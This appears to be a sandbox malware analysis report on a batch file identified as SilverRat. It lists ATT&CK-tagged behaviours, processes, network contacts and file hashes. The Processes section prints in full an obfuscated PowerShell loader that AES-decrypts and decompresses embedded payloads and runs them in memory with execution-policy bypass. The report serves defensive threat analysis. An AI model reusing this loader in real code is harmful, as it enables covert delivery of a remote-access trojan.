Analysis Overview
SHA256
d9afd4677b6374d120c2408bdc25c4d5fa2625ece198e0c0eed45960edee89b4
Threat Level: Known bad
The file rthingy.bat was found to be: Known bad.
Malicious Activity Summary
SilverRat
Silverrat family
Downloads MZ/PE file
Command and Scripting Interpreter: PowerShell
System Location Discovery: System Language Discovery
System Network Configuration Discovery: Internet Connection Discovery
Modifies registry class
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2025-02-14 09:36
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2025-02-14 09:36
Reported
2025-02-14 09:39
Platform
win11-20250210-en
Max time kernel
147s
Max time network
150s
Command Line
Signatures
SilverRat
Silverrat family
Downloads MZ/PE file
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key created | \REGISTRY\USER\S-1-5-21-3418141264-4181727730-1624968314-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
|---|---|---|---|
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 3904 wrote to memory of 1084 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3904 wrote to memory of 1084 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\rthingy.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Meo76zIdzGxWzcGjAKAOLGgRVR1B6hHfBtJu6auoogA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+ru86nRFMP8Q91uK61+/ow=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dAblc=New-Object System.IO.MemoryStream(,$param_var); $shsCO=New-Object System.IO.MemoryStream; $SyeQT=New-Object System.IO.Compression.GZipStream($dAblc, [IO.Compression.CompressionMode]::Decompress); $SyeQT.CopyTo($shsCO); $SyeQT.Dispose(); $dAblc.Dispose(); $shsCO.Dispose(); $shsCO.ToArray();}function execute_function($param_var,$param2_var){ $tTPRa=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $wQaXC=$tTPRa.EntryPoint; $wQaXC.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\rthingy.bat';$lVTof=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\rthingy.bat').Split([Environment]::NewLine);foreach ($pGkrh in $lVTof) { if ($pGkrh.StartsWith(':: ')) { $PioZz=$pGkrh.Substring(3); break; }}$payloads_var=[string[]]$PioZz.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping [...]-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iIiBwcm9kdWN0X25hbWU9IiIvPjxleHAgZXRhZz0iJnF1b3Q7RSt4YkF6Nlk2c1UxMjg5YlM2cWw0VlJMYmtqZkJVR1RNSnNqckhyNDRpST0mcXVvdDsiLz48YXBwIGFwcGlkPSJ7OEE2OUQzNDUtRDU2NC00NjNjLUFGRjEtQTY5RDlFNTMwRjk2fSIgdmVyc2lvbj0iMTIzLjAuNjMxMi4xMjMiIG5leHR2ZXJzaW9uPSIiIGxhbmc9ImVuIiBicmFuZD0iR0dMUyIgY2xpZW50PSIiIGluc3RhbGxhZ2U9IjMiIGluc3RhbGxkYXRldGltZT0iMTczOTE4NDAzMyIgb29iZV9pbnN0YWxsX3RpbWU9IjEzMzgzNjU1NjU2MjA2MDAwMCI-PGV2ZW50IGV2ZW50dHlwZT0iMzEiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjIxNzk4NjIiIHN5c3RlbV91cHRpbWVfdGlja3M9IjU2MjE1MjgwMzgiLz48L2FwcD48L3JlcXVlc3Q-
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| NL | 4.175.87.113:443 | msedge.api.cdp.microsoft.com | tcp |
| US | 199.232.210.172:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
Files
memory/1084-0-0x00007FFDA9143000-0x00007FFDA9145000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ttrtiaum.rkg.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1084-9-0x000001FEE8440000-0x000001FEE8462000-memory.dmp
memory/1084-10-0x00007FFDA9140000-0x00007FFDA9C02000-memory.dmp
memory/1084-11-0x00007FFDA9140000-0x00007FFDA9C02000-memory.dmp
memory/1084-12-0x00007FFDA9140000-0x00007FFDA9C02000-memory.dmp
memory/1084-14-0x000001FEE84D0000-0x000001FEE84DE000-memory.dmp
memory/1084-13-0x000001FED0320000-0x000001FED0328000-memory.dmp
memory/1084-15-0x000001FEE8500000-0x000001FEE8510000-memory.dmp
memory/1084-18-0x00007FFDA9143000-0x00007FFDA9145000-memory.dmp
memory/1084-19-0x00007FFDA9140000-0x00007FFDA9C02000-memory.dmp
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat
| MD5 | 1f2c3f2201f48d8183a4d61d798177e5 |
| SHA1 | ff85fab86cb79b8ac862b879ab272d8f9b0bbec4 |
| SHA256 | 22be5badfa40ffa908d70638e28419b940437e5140925138164bac9a474770e9 |
| SHA512 | 1597efbb2d05fd309573c529a6a0608d90730d4d90f362c529aaa16d564c7e82b963b06b8d68ee3404a981318c5fcedd0ea5e117e2bc92ed88108864b708d27d |
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat
| MD5 | fc6dd02bcc9dcd70d2d2e6f2bf6a8480 |
| SHA1 | a804945de20c3c5c7d9e20ba5a29d989f71736fd |
| SHA256 | 205cd193614c5c6ecde093110505bd11d404520b992be7f0ebe3bb75c4c7ba4b |
| SHA512 | 0852b513ebcfb57cf5da8a10db5cd6723913ebb90ed25efb3d3e8ee1a3ef1e32ae9b41b0ada3505ace90a98938ed4b9d926884b3d9db40a9e74a97aa32625d20 |